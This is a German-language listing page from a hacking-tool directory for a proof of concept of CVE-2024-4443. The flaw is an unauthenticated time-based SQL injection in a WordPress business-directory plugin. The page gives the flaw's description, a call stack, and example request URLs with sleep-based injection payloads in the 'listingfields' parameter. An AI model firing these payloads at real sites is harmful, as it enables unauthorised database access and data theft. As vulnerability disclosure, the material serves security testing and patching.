Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4443-Poc — CVE-2024-4443 Business Directory Plugin – Einfache Auflistungsverzeichnisse für WordPress <= 6.4.2 - Unauthentifizierte SQL-Injection über den listingfields-Parameter | Kitploit
Tools/GitHubGitHub/truonghuuphuc/cve-2024-4443-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubtruonghuuphuc/cve-2024-4443-poc

CVE-2024-4443-Poc

CVE-2024-4443 Business Directory Plugin – Einfache Auflistungsverzeichnisse für WordPress <= 6.4.2 - Unauthentifizierte SQL-Injection über den listingfields-Parameter

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-4443-Poc

CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Nicht authentifizierte SQL-Injection über den Parameter listingfields

Beschreibung

Das Business Directory Plugin – Easy Listing Directories for WordPress für WordPress ist anfällig für zeitbasierte SQL-Injection über den Parameter 'listingfields' in allen Versionen bis einschließlich 6.4.2 aufgrund unzureichenden Escapings des vom Benutzer bereitgestellten Parameters und mangelnder ausreichender Vorbereitung der vorhandenen SQL-Abfrage. Dies ermöglicht es nicht authentifizierten Angreifern, zusätzliche SQL-Abfragen an bereits bestehende Abfragen anzuhängen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/business-directory-plugin/business-directory-plugin-easy-listing-directories-for-wordpress-642-unauthenticated-sql-injection-via-listingfields-parameter

Aufrufstapel

root@kitploit:~
WPBDP__Listing_Search->execute (\business-directory-plugin\includes\helpers\class-listing-search.php:88)
WPBDP__Listing_Search->_traverse_tree (\business-directory-plugin\includes\helpers\class-listing-search.php:185)
WPBDP__Listing_Search->__construct (\business-directory-plugin\includes\helpers\class-listing-search.php:35)
WPBDP__Listing_Search::parse_request (\business-directory-plugin\includes\helpers\class-listing-search.php:214)
WPBDP__Listing_Search::from_request (\business-directory-plugin\includes\helpers\class-listing-search.php:210)
WPBDP__Views__Search->dispatch (\business-directory-plugin\includes\controllers\pages\class-search.php:54)

Poc

URL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[{{Injection payload}}][1]=

Normale URL: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[1]= Bild

URL für falsches Payload: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=0,5,0))+))--+-][1]= Bild

URL für wahres Payload: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=1,5,0))+))--+-][1]= Bild

Tool herunterladen